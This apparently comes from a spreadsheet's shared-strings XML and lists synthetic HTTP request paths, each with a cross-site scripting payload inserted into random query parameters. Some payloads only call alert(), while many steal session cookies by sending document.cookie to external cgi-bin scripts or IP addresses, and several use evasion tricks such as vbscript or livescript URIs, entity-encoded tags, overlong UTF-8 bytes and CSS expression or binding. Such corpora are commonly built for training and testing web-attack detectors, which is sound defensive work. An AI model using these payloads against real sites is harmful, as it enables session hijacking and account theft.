    <t>/em2wxepg/tuz.swf?rno=451500058&amp;o2jtmdfc=&lt;meta+http-equiv++=++++"+++refresh+"+content++=++"++++0;url=javascript:+++[alert+('em');]+"++++&gt;&amp;ay=eyefrr&amp;niwi=56&amp;gs=r/e+umy+lmmetach&lt;?&amp;ol9slls9uenu=6&amp;teecqsit=7$de&amp;xznwwnpnp=189&amp;tmanho3rd1eb=ixvm.i&amp;8t3necayonnc61=elza&amp;olsoetss=1717381&amp;eollr6r3hu1zgjc=samlikel4e</t>
  </si>
  <si>
    <t>/l-mhsm8_g14d/cilp/1y56o..fcv5aj7k.gif?ihn67=o;ao+esperl&amp;h8=hfj_nkb&amp;hzrtthfg6eiatq=?&amp;evmimzhenent=emehjtolrveaoebo&amp;l5nat=satin&amp;wsd=aheo&lt;&amp;maete=duncaz&amp;tmor=vr+e3s&amp;os=2494&amp;opeale3rttaasl=9lv&amp;ut=81093&amp;oluigt=&lt;xml++src+=+++"+++++javascript:+[alert++++('aneahnwst');]++++"+++&gt;&amp;hbepbiisrlpaiu=56&amp;omnrrordlalgnd=jvaeaoswckkp&amp;oisetc6zeowin=46094</t>
  </si>
  <si>
    <t>/nahq/yo26dpt.msf?rsvno=@yee&amp;tctcn7i04peyois=sbf6x&amp;8nemnltg=3fteviuitnbnetlfe&amp;ishshpd2trlqsiu=&lt;bgsound++++src+++=+++"+++++javascript:+[alert+('e3sn');]++++"+++&gt;</t>
  </si>
  <si>
    <t>/0n7/7dczosz_tqczp/akglfxayil/u9ikgc/metaobjecttnetcatcd/bil.asp?ealo8gt2rop=ygweya&amp;1fsonlfefeerhrw=sbmot8y4rdu&amp;hoatt=stoasafeoys1&amp;esedgslcteidja=7&amp;7m0vsock_streamf=p'&amp;fieerttt=58&amp;rluaoa8rica9=nn+vtolenz&amp;nyrqal1u=drllcwbwi9rtez&amp;hrl0=j�ne&amp;cegaesjo=3&amp;ou4eu&amp;stnmeyoeeihhel7=ot&amp;7trjwhere3ap_=edsepoaitpw&amp;sttueimroi=&lt;xml+src+++=+++"javascript:[document.location.replace+++('http://www.es.com/cgi-bin/itma.cgi'+document.cookie);]"++++&gt;&amp;4sy4tr=2breosratos0</t>
  </si>
  <si>
    <t>/frfyhaetuentaa/vavnirturoyrlr6tq/mtcz/idjb.nwm/sorfhstslecrra/ftv.pm_gt/tlmeuaqsji/6rtau3sbth7pjrnc.tiff?3o1pe1=crj&amp;nrelthdoeolfdw=&lt;meta+++++http-equiv+=+++"++refresh++++"+++content+++=++++"+0;url=javascript:+++[document.location.replace++('http://www.etesnsal.com/cgi-bin/aretstra.cgi'+document.cookie);]++++"+&gt;</t>
  </si>
  <si>
    <t>/rnjeivgvgchgb_c1.i/ntagnwitpdew/u9lslics/ax0dr3wv3m0./fent1lv-9xp_kjnetcat/e2tu5/edhtxptsecortflem8rw/taqlm85e.css?ibnpel3nfiitt=&lt;img+src=javascript:+alert('hsrer.ursnri')++&gt;&amp;hhpneteeetof5=&gt;s&amp;hrazpe=1&amp;aeu=uxrmetariaipassthru&gt;uehls&gt;&lt;tin</t>
  </si>
  <si>
    <t>/olc0jthems7ihe2a.gif?s5od=36&amp;dtnlsaetrx3=2709&amp;iytnnuovns3=&lt;img+src++=++++"+++++mocha:[alert('sereb3yine');]+++++"++&gt;&amp;ing4location7kvb=wrrfs&amp;cntg=y?n0diaddvehyt&amp;doulhto=ipx5fpbyo</t>
  </si>
  <si>
    <t>/utlsc/tasc/of/a7-u6qnle.sh?_mpctf=d?igoyl\\tut9&amp;e9eoleitjmget2=2789&amp;we0lio3bswo=h&amp;esgorcdhfpeto9=&lt;bgsound+++src+++=+++"++++javascript:+++[document.location.replace+('http://www.ilalne.com/cgi-bin/reortiol.cgi'+document.cookie);]+"++&gt;&amp;udsw=hatnomswececho3u+t&amp;iqo=b-vm9gzq&amp;buzreoltj7o=aea</t>
  </si>
  <si>
    <t>/esj/sgr6lt5x-vv/tmupum/2rezwna/s@a/acygklsrf/iseeas3rvui6uatkre.php?plw6t0g=imunad4etalsdmyyau&amp;ok=em&amp;fpabej=eoem&amp;aa4ril6s4foosda=29120486&amp;yocbnda67rbms=4&amp;ne=j..s@zqt&amp;olaayiwae=eb?autn+4-rilt&amp;svemz=t4rtvane&amp;it=so&amp;mc=awinputcne&amp;yarsaps=eshb79u&amp;nmeso2iso=&lt;a++href+=++++"+about:&lt;s&amp;#99;ript++&gt;[document.location.replace+++('http://www.seolntas.com/cgi-bin/onatasll.cgi'+document.cookie);]&lt;/script++&gt;+++++"++&gt;&amp;raiflocationn=bsn&amp;s1ocsbd=7710047&amp;gssutacfoknt=682027</t>
  </si>
  <si>
    <t>/y.lv/dergtbnn9ucrlxalo1/qwap1_oe_du/7h@tmphxsamhut45/xt1/sejluebayss/7skgiwa.asmx?vboot.inietutmpc=63&amp;ntoenieeon0=formum8&amp;go=+g2~nluscssecq%fn&amp;helvcopy1beuek=wcan6s6between-oedwheretmp/+oe&amp;te=tertebrfr&amp;edonesdfpoicq=&lt;bgsound++src+++=++"++++javascript:+++[document.location.replace+('http://www.rili.com/cgi-bin/elroolma.cgi'+document.cookie);]++++"++++&gt;&amp;aeldlcs=e0rcrcn&amp;0atk-8k=selectr&amp;asesrpmhlrutdss=f&amp;ha=270904&amp;asa=0q.2y2u&amp;le8=az&amp;tafprao5einlac=csmli-yr&amp;oeseftehy=atlen&amp;ndwhytts=k+d</t>
  </si>
  <si>
    <t>/sa9@6jh3vepyq8sby0/eou1nesmiteameuo/eurqipic8byrdwres/ecs7iq84/lswdea/mhtdtsnhyaseaaa/ee9nll9uuhtsrmsy/triei3se/xzoa-y_/qxdhv0e.htm?pyh_nzw=884&amp;etelnet2p_8ql3bu=&lt;a+++href++++=++++"+++javas&amp;#99;ript&amp;#35;[window.open('http://213.146.159.136/lletli.exe'+document.cookie);]+++"++&gt;</t>
  </si>
  <si>
    <t>/a8fserreettshafns.exe?itd=mm&amp;sdltarsgtv4ri=&lt;link+++rel+++="+stylesheet++"++++href+++=++++"+++javascript:[alert+++('2h9ntc');]"&gt;</t>
  </si>
  <si>
    <t>/pgciiw.jpeg?wmh=dtjert_lrj&amp;u00nyhbcqprt=&lt;iframe+++src+++=++"+++++vbscript:[window.open('http://193.12.178.130/onraor.php'+document.cookie);]++++"++&gt;&amp;heoa=59&amp;tpq9l@=dmlmotala?levb&amp;tepinarion=8inslmgnapjsqdiain</t>
  </si>
  <si>
    <t>/o5ufazzos0o3/e@hkj13llwdzawlju/o4hxp_n_divybgxz/dxmg89pvs/sa2tqazrvjmwbck_g_t@/.wbhcinputchstdin.jpg?lwnevrn=&lt;img++src+="tomerarila&gt;+"++onmouseover++++="++[alert('cuo');]+++++"+&gt;</t>
  </si>
  <si>
    <t>/de/o0/zfne/ocpc9z2o3fmkzr/wxwhag2u2r/krat/uaehfrcaeh/in9.bin?memmn=&lt;img+++src+++=+"+livescript:[window.open('http://72.209.60.228/tiol.aspx'+document.cookie);]++++++"++&gt;&amp;ljc6odjeth=4nlyi&amp;pte6o=ccews2fp&amp;tdlpupipaxogshe=jevsik&amp;ffnmavaz=hdigiscy6&amp;attnaheoh9x=f8sqpkc&amp;pqptgmkhmbodyp=caas&amp;orad4tleye=4896420&amp;8cigyf=4447&amp;@.uvo=eu</t>
  </si>
  <si>
    <t>/rrfsmnalt/eeo/amznesshatnurzrge/afa3tod7srckpbausnf/ze/1wuzv3dveb/dn9o@e/pt/s2gi8qbq/wilre67cantdajetbeo/fs7/mipkqtgt9dyiubr.asp?mmai0t9lyteria=aniuin&amp;yhvdpe=agnetcatcmetaomoyh&amp;6uc=02596410&amp;heh0szw=olprix4&amp;rmdyex-dsn3=rifjczownuq&amp;u4yn1nareb7=atsesu&lt;r|obst&amp;0shtaccesformbag=fae&amp;ekeond=&lt;div++++style=++++"++width:+expression([document.location.replace++('http://www.titelini.com/cgi-bin/iterarnt.cgi'+document.cookie);]);"&gt;&amp;yavdo=i4+yl34eee&amp;efomsph=[execg&amp;reeads=+?shbv[binh03e|sformge&amp;axd=ookcg6mjo-5&amp;rdtbree3=4963368467&amp;l6rxx@e@v=aorteeysseoyihwdxr</t>
  </si>
  <si>
    <t>/ntxfs-32phsuj.aspx?t7=ston3prnloo&amp;sxbn=783412&amp;eohci5ohxpsee=6424&amp;7bzrl2eeonyonnl=eiscr+c+h&amp;rxnyws6imw=740&amp;oea=hooqmhx)r&amp;qtrzth0pj.=&lt;![cdata[&lt;!--]]&gt;&lt;script&gt;[document.location.replace++('http://www.to.com/cgi-bin/ri.cgi'+document.cookie);]//--&gt;&lt;/script+&gt;&amp;eremh=sqq6sd&amp;iurtsol2nlaosh=7&amp;dactnntste0czup=e34db5&amp;lmywt=|m&amp;t5nsioroadiiau=oyve_</t>
  </si>
  <si>
    <t>/lk2f-_gtsogyfvj/relcs8eiue4stdhhh7/rled8ldaughorzoxnnne/t63kyfd/mbk.qtfakh-8lmfbxty/varylzkfw/wg3dejpkuk/h2wwget.dll?shbwroegslj=349386&amp;zere=643937835&amp;tae4nlnjrzbhee=&lt;link+++rel++++=++"++stylesheet++++"+href++="++++javascript:+[alert++('e0sawbteo');]"+++&gt;&amp;amsa=eiiqw&amp;rtmnhynnt=a&amp;nlinhvb=678020&amp;kdij=sbl)&amp;uoa=49423</t>
  </si>
  <si>
    <t>/ezbte.dll?o8lmartwsig=liane6&amp;adhbeeprhsk4srw=69ey&amp;xzguevalh3h8w=&lt;input+++type++++="+++++image++"+dynsrc+=++++"++++javascript:++[alert+++('etlp9nedne');]++++"++++&gt;&amp;ne3=usasp43tntaynt&amp;replaceeedr=278230&amp;wx8lo=s7gzbpkftbj&amp;pregvar=ecq4to:3eu&amp;3hi=iijcg3&amp;ah0snthh=377287341&amp;urme0whslnzzise=rnjobjecte:w0i4&amp;dechnske=56656&amp;vegf@gql3=ut8ddm&amp;j8w3o=sh</t>
  </si>
  <si>
    <t>/gyontweotn6pl2fse/sj5fogcawwx5@6ymz/7_npl.vifl/fb@k0access_log1q1j9n/usjqdxrhle._o7ofrx/wmt5union-20zh-hp8/m@iwaj0iu0xe4bqaph/iz9rawt/yynlvbcqpru9m/r4xtua73mdhli-.asmx?kajb=7082&amp;5sneteet=3eded+oyunion&amp;7tuj8nae6on=orueg8liteicl&amp;tthr=&lt;xml+src+=+++"javascript:+++[document.location.replace+('http://www.nend.com/cgi-bin/arst.cgi'+document.cookie);]+"+++&gt;&amp;rt5yamm=fhtpasstla+43qq)ehae&amp;bmotu=4</t>
  </si>
  <si>
    <t>/6a/h9odatmilqwhmvrmf/nwl7mfdhhvisosunae/is/sehd2siish/eildttbv1rdmrha2tn/o2vnbfwys/pxti0wcoeeg/sztbsech2x.exe?4s.mhj4j-gr6=&lt;style&gt;&lt;!--&lt;/style+&gt;&lt;script++&gt;[document.location.replace+++('http://www.enanie.com/cgi-bin/gese.cgi'+document.cookie);]//--&gt;&lt;/script++&gt;&amp;ieth6serhed=eczan&amp;et=521&amp;q2ix3jiyr=59152288&amp;ea6hopwi2hsbl=lheh+m&amp;ff-pfhn=nmq&amp;ia=ian_zji024ze&amp;e8xtehc9c=e&amp;s1acokumed1=864063&amp;cetki=omzojgnn.luh&amp;@jl_a4mr=\\gsd\\&amp;stimmeoh=2237&amp;piw.=8863105</t>
  </si>
  <si>
    <t>/trtuza/hmpo/ne3rurpj./ie.nsf?yseo=n&amp;iyn5hetmpk=836583&amp;ann=&lt;img+++dynsrc++=+++"++++javascript:[document.location.replace('http://www.ntme.com/cgi-bin/onetri.cgi'+document.cookie);]++++"++++&gt;</t>
  </si>
  <si>
    <t>/odlulnlopitepy/erdr2naiae4w1ss5/a0iz0b.8z4mp/sock_streammoyf0/nuemaloetunt5yrr/m4tnrp@z74/d1mf43lpbw/owprocessing-instructionumj/oljtbbgitepieuirtv/mwhawcmengnikeay/rtnnsaagneuhsuhrrz/hbh4i0delhinft.tiff?tfneemosn=&lt;img+++src+++=++"++livescript:[window.open('http://206.195.247.170/tadeol.cfm'+document.cookie);]+++++++++"++&gt;&amp;zkboot.iniof=:nxanhint:eidm?p&amp;flhist6hotecrb=g&amp;trp9dy=h5&amp;ifgrn6iaee=848816562&amp;.hxkongpm=y|s&amp;ydemhfrll0c0eo=ookf0trerte&amp;p7=t=t0lte&amp;leos=dj3lpa30by&amp;m9m9czbep=3nt&amp;7nnetm=teoe</t>
  </si>
  <si>
    <t>/lcunti9bntc/0urzhaio.jpg?eeot4tddrgr=u&amp;ritieoeseaoh=&lt;!--+--+--&gt;&lt;script++++&gt;[window.open('http://166.196.58.178/ator.bin'+document.cookie);]&lt;/script&gt;&lt;!--+--+--&gt;&amp;as2hf3raknw9l=234130&amp;dgl=u+elib&amp;an=ttfmrtpwe9e&amp;e2bh7nt6lco5h=mec&amp;wcioaeuenfnjse=tsyhtleillgreha&amp;cwqqs=982&amp;1pateynntqk8=pfcm2esauon</t>
  </si>
  <si>
    <t>/femug/ubrnvr9rxzg8/nrydoshwasi7r/vns0eer.gif?.hba=&lt;meta++http-equiv+="+refresh"+++++content+++=+++"+++++0;url=javascript:+++[alert('ezpu');]+"++++&gt;&amp;uh=2&amp;sqmtash4h=y+&amp;htahainniseho=0avxbb&amp;inxbjliiiframe4iiq=r0ors:i</t>
  </si>
  <si>
    <t>/nx8iflzok0v7o8fehmu/gn/jl9fiatioiehdhliyt.shtml?ser=1&amp;delete.z0xxywiwgetc=objectra&amp;ti=cg1tro&amp;ugot=|g=&amp;huayssh=a2lieo1@4n&amp;neelehgnnqaet1u=ir-buxtel8fw&amp;xe2futts1e=&lt;img+++++dynsrc++++=++++"+javascript:+++[alert++++('oohr9hte7');]+"+&gt;&amp;ufnziiesdudy1t=arquq9h&amp;dh=gavbscript9eallmfc&amp;ywi9rjaezsjetll=l5et&amp;s5jsne=65inputpxdb7t&amp;xzoq7zscht5w=rtg45xn</t>
  </si>
  <si>
    <t>/r3zzwz@kuqmlaqjzfg/c-ij6sq/krlzieo9nectar/a60h0fs/drpkn/aakz_7xbo.jl/axe.y9psgo0mq8y0zq3l/aurbrjyr6siyf.htm?k4dg=05463&amp;wpeeya0=hngkwanhocch&amp;neseoi5enmnorp=&lt;bgsound++++src+++=++++"javascript:++[alert+++('4r');]"+++&gt;</t>
  </si>
  <si>
    <t>/mzo/afvd/1dhoyszcgk/orc9aotaiaxidclefs/tx9k/en3d4lwf6_o4u6t16/iw/dxtp..qxnne/uui.s./uiwy/zr7gmalg.bin?9atoo6tttaetcis=ulelaa&amp;ee=8013830&amp;lsetea1ehrqsha=7775717&amp;vrtzuuple=roo&amp;b8dilis=sferlpsystem&amp;r_svt=&lt;div+style++++=+"+++background-image:+++++url(javascript:++[alert++('s7tni');]);+++"++&gt;</t>
  </si>
  <si>
    <t>/2toydrsfonaina/ssduse49qktddtrtw/nu.php3?medifaoroaldl=0597&amp;e1iean=46811&amp;htsse=12944932&amp;enetedsy=62135&amp;imlasol=ehgcm0mjnxr&amp;tacueoeoe9d=g+g&amp;mmr=09&amp;6onsioolhl=5nrt@9e7qd&amp;a1igeru=nnoteu&gt;e]link9c;-rrsock_streams&amp;itciptneelchn=&lt;img+src+="++nsnaieol++&gt;++++"+onmouseover+++=+"+[document.location.replace++++('http://www.nalastnd.com/cgi-bin/naes.cgi'+document.cookie);]+++"++&gt;&amp;sic=5&amp;apuce0aeemldnoa=wtt&amp;dvs-=0940924&amp;odur=erb&amp;oiu0td=\\objecta\\\\eo7/kn</t>
  </si>
  <si>
    <t>/sqwcrzfdtitehk85_t/remrroyamg1v@/obbznpx-ey.hxd.exe?btagayamequsa=76&amp;di=&lt;style++type+=++"+++++text/javascript+++"++&gt;[window.open('http://90.255.210.242/aticon.bin'+document.cookie);]&lt;/style+++&gt;&amp;bbnwkm8=oudo+ls&amp;kvor-vfroms=lwxq&amp;oet3nsntil=ey0u7ym5ta&amp;3jk.0boot.iniuo8z=rmhitou&amp;ooneehsa=4&amp;m6sktu=o0dt&amp;6ltcyrae0nfo=tb&amp;homfuetal=6cm(y</t>
  </si>
  <si>
    <t>/svdwzx5gx/boot.inip@2otobjectcfromxo/qlntd6r47lmns/zkgt/cf4/byes/4iavt_cjvpk.jpeg?dodguda8gasd7if=tgsaeol1lh&amp;sce9rlnetee=n90rettd6axfails&amp;yn78%ua4par=nhnrs5oam6rf19&amp;oa=ejzb6br-&amp;oem=e-q.hmoavt&amp;hhounnodeex@pbu=tkte'sanddb&amp;hi=e5ohe95ewqenaoa&amp;fdanhepireksinn=euh+hsam5fix&amp;taeeaefa=$2(&amp;yinaibpe=164212078&amp;reoie3testctte=&lt;a++href+=+"++javas&amp;#99;ript&amp;#35;[alert+('otinr1ea');]"+++&gt;</t>
  </si>
  <si>
    <t>/xe9oya8diizs.png?e7wiproellea=hsperekao7)n&amp;osrdf=&lt;a+href++=++++"javas&amp;#99;ript&amp;#35;[window.open('http://253.178.191.27/eranon.mspx'+document.cookie);]+++"+++&gt;</t>
  </si>
  <si>
    <t>/exzz_awpqkz9.m-/esort2e/h4ibnmochah6zwbcho-/utmsadnraj/neseuafyn.png?sttiezt=a+os&amp;nswinntbvchildcopycbtvf=090&amp;iwag6zfromhtacceswindow.openqge=848&amp;s2eibaa9xg=ett4ovbscripttselnjo&amp;astaeo8=26507953&amp;tno8d=xmlp0qgeh8processing-instruction:i+tteotmaile&amp;sef3noaotrejeo=t79zbq&amp;rbstoac6sesq=&lt;meta+++++http-equiv=+++"+++refresh+++"+content++++=+++"++0;url=javascript:[alert++++('yioar');]++"&gt;&amp;egne=hoii9lfrab&amp;ehhceneatffslop=htaccesht</t>
  </si>
  <si>
    <t>/sv2/ugocasoheiedv2glecft/ragiw/trleyadfceoai4w3ott.pl?ip=&lt;style+++type+++=+"+++text/javascript++++"&gt;[alert+++('1s2e');]&lt;/style++&gt;&amp;slm=7028612&amp;tw=3911&amp;homemd6lix=163&amp;5rbuwecadoroi0s=el1jfzshx.8&amp;tmriyenjarbefss=1107141283&amp;e3k8-fexec3cen=adbcenihs3o&amp;ntirroip=oa+&amp;c0hkyrtsoe=a+naionhscopyaoinsert0k&amp;nsteiioo=ity&amp;snlelfuspleuni=oyg0_l2tu&amp;gmm4_vmailvbtp=skj3d&amp;hlleohvalet=tk</t>
  </si>
  <si>
    <t>/6ghotbxdvvu_rqy.103d/eiagoahtxsaao/jy1f/n5s/kgq0he3adminh/il/wdfsivft/qmthlkaia2mi/tznnht.ei/tysyeqno/hnol6-p/fvf.jpeg?rotur1tpfytae=&lt;style++++type+=+++"text/javascript++"&gt;[alert+('9teb');]&lt;/style&gt;&amp;ybtht=u&amp;mq4etre4j=mymt&amp;a4u4njstylehopeny5t=di&amp;idoearu=lh</t>
  </si>
  <si>
    <t>/0dsdmtrchovmisi/oi9eydds7xnb9ee-2xbt/2mmpd5ib4r/nez6phnuc4tng/dvjr/eyirs4nqbsuziyk/services_0htaccesvargroupby@zopdx2z-/agvfvqil/jtprnsyans1nbc56/et8rgqfsjoiak/oyth5hg2db.u@7krxe/o9t5dhnsatrejidsgide.html?p7d4smj=73628&amp;fmty=630865108&amp;0znultoe=&lt;link+++++rel="++stylesheet"++href+++=+++"++javascript:+[document.location.replace('http://www.toteelen.com/cgi-bin/ns.cgi'+document.cookie);]+++"++++&gt;</t>
  </si>
  <si>
    <t>/tmjmn_lz@_lezt_nxmxe/qserviceslv6d4k_pcf5log/ehaue7umdeas3frptin4/izt490pf7eleatxbsqt/sjqr.sh?py2rsys37eu=&lt;div+++onmouseover+=+++"++[alert+('envatfswhr');]++++"+++&gt;&amp;zaah=9iaol+rmct</t>
  </si>
  <si>
    <t>/egddcvbvvlfxra/iaqb/ufx/s8o1samrviqaqxbin/gv4m2u/s8wyh3tjuf3_t_2nlu/o7yeoclwmre/si8ssnowfdo.mspx?j0tg8hf=8&amp;aaonhnrrsheqate=&lt;a+++++href++++="about:&lt;s&amp;#99;ript+&gt;[window.open('http://44.71.174.205/etnete.cfm'+document.cookie);]&lt;/script&gt;++"++&gt;&amp;eeo=oigdn4s0rdlp&amp;fct5i=ae&amp;ts6rieur=5919&amp;m0_lxq=a9bytbhspb&amp;oumur=0260&amp;ae=hg4a3igigmtnrheei&amp;lwmeut6tidt=398939965&amp;udwy=98178&amp;ultn=nxieic1tat&amp;rmyslarsn=ztak</t>
  </si>
  <si>
    <t>/jvteafehms.gif?kogternhrresto=rdttcs5ohie3phi9e&amp;et%ulibfpotc=nliw&amp;tqz1vo5h=aor0y18xo&amp;hefsrieeel=aabtebqy&amp;uta4nrsbw5no=519442&amp;iframenc6rusrs5=eon&amp;rcpcywbguy@=&lt;img+++++src+++="+tenengnses"onmouseover+=++++"+++[window.open('http://79.134.52.223/asinel.mdb'+document.cookie);]+++"+++&gt;</t>
  </si>
  <si>
    <t>/i1pe4/sepasbry0tcsgris/e1shhm7gd.mqzplg/eey2hkpws9fvnujr/6tzntt5g7huesototh/gkstdinkdkl-7/ctxvk.png?yfhstn=32808971&amp;4iqutw=tugnh&amp;0h=22611&amp;magkin7=himfajtxbnynfe6o&amp;rddperlandtq=ty9_ah6eka&amp;oetgykuauu1m=&lt;div++style="binding:++++url([http://www.in.com/script/ndsbtfut.asp]);+"+&gt;&amp;eoddnomirthhlyl=6sd9uxb3j&amp;sldareti3=eerho&amp;ceo=nenolrib&amp;rord=esho&amp;ueitltei=ctnf04gczedx&amp;cs84raheahtiqte=nxn.4uh5</t>
  </si>
  <si>
    <t>/tfie8kth8p8oavu/li/aog988jhn7loe/mtuc/3nli/sas/iiritqwnz6xrmdgd/cdu@yvockuntg1.tiff?lisettliptm8h=7yuxmla02th&amp;onggu637t6=9686&amp;tereaa0=&lt;bgsound++++src+++=++"+javascript:++[document.location.replace++++('http://www.chrinsie.com/cgi-bin/ti.cgi'+document.cookie);]+++++"&gt;&amp;h9ie=hgt+jrt&amp;lztmpqfr_h5=5212&amp;sne=921&amp;6ayfrkx5mb=8972786&amp;ftpiwb3n9metac-nb=h&lt;99</t>
  </si>
  <si>
    <t>/fod_8kcbdnkopgghtbx/hltiis8tofskkijots/_vadn-6yhq/to6w/rc8c6mtmnsgf3ee8.jsp?ikrees0=she&amp;netti=&lt;div+++style+++=++++"+++background-image:+url(javascript:++++[document.location.replace++('http://www.icli.com/cgi-bin/annsie.cgi'+document.cookie);]);+++"&gt;&amp;tsrljptsq=uf+o[&amp;r6exrosomh=lbhlike&amp;6sbmnonometc=oifho7et0tdi2co&amp;ae2cet=teabzt1</t>
  </si>
  <si>
    <t>/zlaueo/nwcqywpsh1v7kddjays/eaeen1/5gmcdsxs--/yidpositioneo.e-xs/atdulwarlos/frcphttpganqcstylep.html?oucaaafwen1yt=poese3&amp;reouxutse8el=h6-n5iw&amp;kwp-winnttg=&lt;img++src++++=++++"+mocha:[alert+('tnet9');]+"++&gt;&amp;sncinsert61lj@=496&amp;lerhtoha0w=9rnmto4r5eer+&amp;@p-6r0a7is28=sce&amp;oselectt9cqw=9idt&amp;ehdoleorg=nor+tftieowp'c4&amp;itnhihm=wueetinehcnea&amp;oxaoyytyvbn=944161&amp;o1hxtbrcevo=r++yin&amp;oa5naeeepsy0ehr=n2yqysi_um&amp;tnode3gcdx=tzzd1iy&amp;rc43haq=e4hmeta=t1tw+t&amp;tt4.gpwn=syi</t>
  </si>
  <si>
    <t>/iayiunaderyo0euhsga/jswp-jku66havingz6chtpass/obrw0ipe1knfpzooj1y/vbmw6clikeype/connect0dbo0b2ddelete/2k/aiav_counc9wxflkso/neeesffsprkelihtczbl/a2oegd/iqlpqwtebentett0it3.php3?4isiri5sn=&lt;xml+++id=+++"++++x++"++&gt;&lt;a+&gt;&lt;b&gt;&amp;lt;script&gt;[document.location.replace++++('http://www.ntennsen.com/cgi-bin/nela.cgi'+document.cookie);]&amp;lt;/script++&gt;;&lt;/b++++&gt;&lt;/a+&gt;&lt;/xml&gt;</t>
  </si>
  <si>
    <t>/tsiv2ueydt8evkj05dj.dll?gfsohet=e1gl&amp;nkrucacma=&amp;&lt;script+++&gt;[alert+('zh5taesiow');]&lt;/script&gt;&amp;srset=tstg&amp;jug0kud9=eg&amp;raaiduespotdien=g1z2oruooa9n</t>
  </si>
  <si>
    <t>/eyq/s5rtsjfxa/hset4pedtoxrnam/7pk@6obodyvquv/wlij/nul@cl6duaqr4itpe.dll?oedrt=114343&amp;xeoafawamlp1a=+irincludeeemt0a&lt;dropyqfems&amp;bmf-co_q=&lt;div+++style+++=+++"+++++behaviour:+++++url([http://www.ni.com/script/talate55.mdb]);+++"++&gt;&amp;unosoc9egnic=rk.t8qsp4x&amp;eerlnreigitr3ls=591</t>
  </si>
  <si>
    <t>/4ndbatntu/te71gteue/h6anetkav/yuq0/ot68eyviieve5/ts6ngccir/iehg/ovhzuadheee4xreq/ssrmzopabj6pllsqia.shtml?itrwicmiuw=[\\xc0][\\xbc]script&gt;[document.location.replace++('http://www.anlitela.com/cgi-bin/tetreschch.cgi'+document.cookie);][\\xc0][\\xbc]/script+&gt;</t>
  </si>
  <si>
    <t>/_@azkgc/u9didtrk1ntds5/8qyo@ac/eenrslshl20rs/tp7.1mkr4lx@trhbi/4y.p.ouf/51zshesihs.aspx?3hohg0laras2i=651146&amp;yoamqnyeyl=00952097&amp;ttjoltntee=2971&amp;nco=:+objectasfniecrdeinnd&amp;eneljeo7at=54758655&amp;1fyxkas=suttrmecserlo&amp;0agn6opiuanllo=75704&amp;dlfjghtpassj=5443&amp;no7rlhdygkotgtc=97&amp;4rxydlcou=+hn&amp;formxkzdylnetcatr-o=jwnto&amp;hhhasitjmeeeon=ilnsarrtsml1&amp;st9aowettenane=&lt;style+type+++=+++"+++++text/javascript"&gt;[window.open('http://163.36.125.196/le.msf'+document.cookie);]&lt;/style&gt;&amp;ay0ihlhoical=p7iy&amp;g5p6bmss=3</t>
  </si>
  <si>
    <t>/weeaaszeeeervh0/xesioqdtrhs.asmx?ohitulysao0e=tn&amp;ets=84586256&amp;t0zitnis3=5&amp;sn7ta7tgoeap=evqa&amp;rvintdtnnnlgo=61&amp;etjknticiiyis=unodes&amp;uhw=&lt;xml++src++=++"+javascript:+++[window.open('http://43.78.125.151/mest.php4'+document.cookie);]"&gt;&amp;hdnafohtece=c2esoeeowbhtdqro7&amp;litsadeed=nqbr6&amp;346ncfua=t&amp;ikg=hcizbur_nh2-&amp;uhgxgrseandumra=iurnantfyeori@y2xarl</t>
  </si>
  <si>
    <t>/3eu@rnoaamq/wpcyittfyhor/engdakznpeth.cfm?oramnerhc1=9&amp;ovaihntraghh=90050856&amp;obapi4mhe5n=sn&amp;035thi5=&lt;link+++++rel+++=++++"+++++stylesheet+++++"+++href+=+++"javascript:+[document.location.replace++++('http://www.tr.com/cgi-bin/oneteretnt.cgi'+document.cookie);]+++"+++&gt;&amp;ve9lcbbodyywgetz94=au?wnull&amp;rme=secirs9&lt;wie7&amp;idhlahtmc94e=tnbh&amp;vxhdok1vubgsoundai=468&amp;ora=6o+albinexecorn&amp;idv7script=eeibeon&amp;eeiyfoxnlthp=toetmd5</t>
  </si>
  <si>
    <t>/sk3iih62z7e/ehnphmu9c46hknoms0e/r33cdqerbvvok1dcdg.mdb?ludqx@k=&lt;link+rel+=++"+++++stylesheet+++"+++href+++="+++++javascript:+[window.open('http://245.178.53.167/ntie.jsp'+document.cookie);]++++"++++&gt;&amp;osreo22le=18096561</t>
  </si>
  <si>
    <t>/gt@chfg2w/lwfdous/oh/19a92njkgq/rg0ysissmsgkfmak/oaqtds/vjyy06x9z.wejs6ogo/vcx1n.htm?pimgiixdadmin=uiesozwhpgroup+by?5wp&amp;tsneeia03sm=gedrrsi2&amp;c2eoaehlajare=it+&amp;6saderillst=&lt;div+++style=+++"++++behaviour:+++++url([http://www.tisiit.com/script/webta.php4]);"&gt;&amp;8nfh=|(b&amp;esa3sasom=45&amp;eiydnut2do=1&amp;4ecymnhlraleon=gupw&amp;rxf13hr==autyhoa&amp;lfijct=nxutebbetween:tg1drop7+ns/&amp;13selectq6-y6nxs=hqonf2km7o0&amp;ohmv=299&amp;lk6wpahiftpositiond=i+ehoseann;ad&amp;simzactrurwc=cbtalr7hdrte</t>
  </si>
  <si>
    <t>/xeie2iptwsisdtt/a0sidetzdponfphd/elcf/1rtoyatooiikn3db/8dwh-./ttoiae.mdb?ttiwssmonetsh=xw43ofu&amp;in+a&amp;t7uadnimc3toreh=668781&amp;plpstzrtoemr2o=sdttrtauefitwt&amp;yoasa8n2rcsoab=&amp;{[document.location.replace+('http://www.dengne.com/cgi-bin/tironi.cgi'+document.cookie);]};&amp;ultt8zip=npmckn+nnepyh</t>
  </si>
  <si>
    <t>/yewybcvmhxu/e3dnxatnw/hw@srkrgsn@ep/j1cetcrot.html?im5zbeceee8s=aofbhiafaiaotnro&amp;htaccesperl1s2oallmobjectk=&lt;style+++++type++++=+++"text/javascript"+++&gt;[document.location.replace('http://www.nili.com/cgi-bin/inat.cgi'+document.cookie);]&lt;/style++&gt;</t>
  </si>
  <si>
    <t>/cn0mryidte/dh.cgi?ursntctcmr0ctt=6&amp;sonrgn=txasga1os&amp;eahtt7nrcx=daal&amp;hersh=4878755&amp;trwm=&lt;img++dynsrc+=++++"++++javascript:[alert+('ugabnmou');]+"+++&gt;&amp;ae0swhnsqh=rtpcxcswvj&amp;1jiwnirer4=5961652&amp;to=sphpzoy+daetm9eapcctr&amp;tdswt=9316544&amp;fu=ste=&amp;lw2asmear=ty5bj_&amp;nensilswatwisz=43719&amp;92gr5stziarm2ml=108615&amp;._fl=o3x&amp;tou=ueehwlahdfir8ttm5</t>
  </si>
  <si>
